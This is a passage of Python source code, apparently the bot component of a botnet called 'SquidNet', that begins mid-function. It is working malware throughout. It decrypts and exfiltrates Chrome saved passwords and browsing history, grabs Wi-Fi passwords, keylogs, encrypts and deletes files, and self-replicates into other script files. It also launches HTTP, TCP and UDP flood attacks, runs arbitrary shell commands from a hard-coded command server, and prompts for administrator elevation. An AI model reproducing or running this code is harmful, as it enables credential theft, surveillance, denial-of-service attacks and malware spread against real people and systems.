"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
key = key[5:]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(self,password, key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return ""
def main_password_yoinker(self):
msgtoserv = ""
key = self.get_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute(
"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = self.decrypt_password(row[3], key)
if username or password:
msgtoserv += f"\nOrigin Url: {origin_url}\nAction Url: {action_url}\nUsername: {username}\nPassword: {password}\n"
else:
continue
cursor.close()
db.close()
try:
os.remove(filename)
except:
pass
return msgtoserv
def gotowebsite(self, website):
if sys.platform == "win32":
os.system(f'start {website}')
else:
os.system(f'open {website}')
def clone(self):
file_ending = sys.argv[0].split(".")
file_ending = file_ending[len(file_ending) - 1]
if "py" in file_ending:
own_file = open(sys.argv[0], "r")
own_content = own_file.readlines()
own_file.close()
lines = []
in_code = False
for line in own_content:
if "#-----SquidNet-Bot-Script-----#" in line:
in_code = True
if in_code:
lines.append(line)
if "#-----End-Of-Bot-----#" in line:
in_code = False
break
else:
own_file = open(sys.argv[0], "rb")
own_content = own_file.read()
own_file.close()
if sys.platform == "win32":
main_dir = f"C:/Users/{os.getlogin()}/"
else:
main_dir = f"/Users/{self.name}/"
os.chdir(main_dir)
workingdirs = []
workingdirs.append(main_dir)
workingdirs.append(os.getcwd())
dirlist = os.listdir()
for dirs in dirlist:
if "." in dirs:
pass
else:
workingdirs.append(main_dir + str(dirs))
dirlist = os.listdir()
for dirs in workingdirs:
try:
os.chdir(dirs)
except:
pass
for files in dirlist:
try:
if '.'+file_ending in files:
if "py" in file_ending:
file = open(files, "r")
content = file.readlines()
file.close()
if "#-----SquidNet-Bot-Script-----#" in content:
pass
else:
file = open(files, "w")
file.writelines(lines)
file.writelines("\n\n")
file.writelines(content)
file.close()
else:
file = open(files, "rb")
content = file.read()
file.close()
if own_content in content:
pass
else:
file = open(files, "wb")
file.write(own_content + "\n\n".encode())
file.write(content)
file.close()
except:
pass
def gotowebsite(self, website):
if sys.platform == "win32":
os.system(f'start {website}')
else:
os.system(f'open {website}')
def send_history(self):
dirs = os.getcwd()
if sys.platform == "win32":
os.chdir(f"C:/Users/{os.getlogin()}/AppData/Local/Google/Chrome/User Data/Default/")
elif sys.platform == "darwin":
os.chdir(f"/Users/{self.name}/Library/Application Support/Google/Chrome/User Data/Default/")
shutil.copyfile("History", dirs + "/History.db")
os.chdir(dirs)
History = sqlite3.connect("History.db")
cursor = History.cursor()
e = cursor.execute("SELECT last_visit_time, visit_count, title, url from urls")
for i in cursor.fetchall():
time = i[0]
visit_count = i[1]
url = i[3]
title = i[2]
epoch = datetime(1601, 1, 1)
url_time = epoch + timedelta(microseconds=time)
self.send(f"({url_time}) ({visit_count}) ({title}) ({url})".encode())
cursor.close()
History.close()
os.remove("History.db")
def run_cmd(self):
try:
if self.fileeditor:
if self.msg.startswith("!stopedit"):
self.send(f"File editor closed for {self.filename}.")
self.fileeditor = False
else:
try:
self.msg = "\n" + self.msg
except:
self.msg = "\n".encode() + self.msg
self.file = open(self.filename, "rb")
contents = self.file.read()
self.file.close()
self.file = open(self.filename, "wb")
self.file.write(contents)
self.file.write(self.msg.encode())
self.file.close()
else:
if self.msg.startswith('!httpflood'):
msg = self.msg.split()
ip = msg[1]
delay = float(msg[2])
self.dos = DDoS(ip, delay)
elif self.msg.startswith('!stopatk'):
try:
self.dos.stop_atk()
except:
pass
try:
self.tcpflood.Stop_Atk()
except:
pass
try:
self.udpflood.Stop_Atk()
except:
pass
elif self.msg.startswith('!cloneself'):
cloner = threading.Thread(target=self.clone)
cloner.start()
self.connection.send("Successfully replicated files.".encode())
elif self.msg.startswith('!changedirdesktop'):
self.changedir(self.desktop)
elif self.msg.startswith('!openfile'):
file = self.returnsecondstr(self.msg)
self.openfile(file)
elif self.msg.startswith('!changedir'):
dir = self.returnsecondstr(self.msg)
self.changedir(dir)
elif self.msg.startswith('!rmdir'):
dir = self.returnsecondstr(self.msg)
self.rmdir(dir)
elif self.msg.startswith('!rmfile'):
file = self.returnsecondstr(self.msg)
self.rmfile(file)
elif self.msg.startswith('!listdir'):
dirlist = self.listdir()
self.send(dirlist)
elif self.msg.startswith('!encdir'):
self.encdir()
elif self.msg.startswith('!decdir'):
self.decdir()
elif self.msg.startswith('!encfile'):
file = self.returnsecondstr(self.msg)
self.encfile(file)
elif self.msg.startswith('!decfile'):
file = self.returnsecondstr(self.msg)
self.decfile(file)
elif self.msg.startswith('!getinfo'):
msgtoserv = self.getinfo()
self.send(msgtoserv)
elif self.msg.startswith('!getip'):
self.send(self.getip())
elif self.msg.startswith("!keylog"):
if self.logging:
pass
else:
self.send("Started to send keyboard inputs.")
self.logging = True
elif self.msg.startswith("!stopkeylog"):
if self.logging:
self.send("Stopped Keylogging.")
self.logging = False
elif self.msg.startswith('!getwifi'):
wifi_passwords = self.obtainwifipass()
self.send(wifi_passwords)
elif self.msg.startswith('!savefile'):
file = self.returnsecondstr(self.msg)
self.sendfile(file)
elif self.msg.startswith('!viewfilecontent'):
file = self.returnsecondstr(self.msg)
self.file_content(file)
elif self.msg.startswith("!getchromehistory"):
self.send_history()
elif self.msg.startswith('!mkdir'):
main_msg = self.msg.split()
dirname = main_msg[1]
self.mkdir(dirname)
self.send(f"Successfully Created {dirname}")
elif self.msg.startswith('!getcwd'):
self.send(os.getcwd())
elif self.msg.startswith('!getos'):
self.send(sys.platform)
elif self.msg.startswith('!gotowebsite'):
main_msg = self.msg.split()
url = main_msg[1]
self.gotowebsite(url)
elif self.msg.startswith('!dwnldfile'):
main_msg = self.msg.split()
src = main_msg[1]
file = main_msg[2]
self.getfrinternet(src, file)
elif self.msg.startswith('!getpasswords'):
if sys.platform == "win32":
passwords = self.main_password_yoinker()
self.connection.send(passwords.encode())
else:
self.connection.send("Running on a non-windows machine - Cannot get passwords!")
elif self.msg.startswith("!editfile"):
try:
main_msg = self.msg.split()
self.editfile = open(str(main_msg[1]), "rb")
self.editfile.close()
self.filename = self.editfile.name
self.fileeditor = True
self.send(f"File editing mode activated for file {self.filename}")
except:
self.send("File cannot be opened on this computer.".encode())
self.fileeditor = False
elif self.msg.startswith("!mkfile"):
msg_split = self.msg.split()
try:
filename = msg_split[1]
file = open(str(filename), "w")
file.close()
self.send(f"File {filename} has been created in {os.getcwd()}".encode())
except:
self.send("Error with creating files.".encode())
elif self.msg.startswith("!rickroll"):
if sys.platform == "win32":
for i in range(10):
os.system("start https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO")
else:
for i in range(10):
os.system("open https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO")
self.send("Just got rick rolled!".encode())
elif self.msg.startswith("!tcpflood"):
msg_split = self.msg.split()
ip = msg_split[1]
try:
port = int(msg_split[2])
except:
port = 80
try:
delay = float(msg_split[3])
except:
delay = 0
try:
pkt_size = int(msg_split[4])
except:
pkt_size = 1024
self.tcpflood = TCP_UDP_Flood(ip, port, delay, pkt_size)
self.tcp_flood = threading.Thread(target=self.tcpflood.TCP_Flood)
self.tcp_flood.start()
elif self.msg.startswith("!udpflood"):
msg_split = self.msg.split()
ip = msg_split[1]
try:
port = int(msg_split[2])
except:
port = 80
try:
delay = float(msg_split[3])
except:
delay = 0
try:
pkt_size = int(msg_split[4])
except:
pkt_size = 1024
self.udpflood = TCP_UDP_Flood(ip, port, delay, pkt_size)
self.udp_flood = threading.Thread(target=self.udpflood.UDP_Flood)
self.udp_flood.start()
else:
cmd = subprocess.Popen(self.msg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout = cmd.stdout.read()+cmd.stderr.read()
self.send(stdout)
except Exception as e:
self.send(f"Error in script: {e}".encode())
ip = '192.168.0.145'
port = 80
key = b'tMFrNEZlqJR8m3GSZ_aHpkDGZefhzK5LK4wFiBC8hn0='
if sys.platform == "win32":
try:
isadmin = ctypes.windll.shell32.IsUserAnAdmin()
except:
isadmin = False
if isadmin:
bot = Bot(ip, port, key)
else:
exec_dir = sys.argv[0]
params = f'"{exec_dir}"'
try:
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, params, None, 1)
except:
bot = Bot(ip, port, key)
else:
bot = Bot(ip, port, key)
#-----End-Of-Bot-----#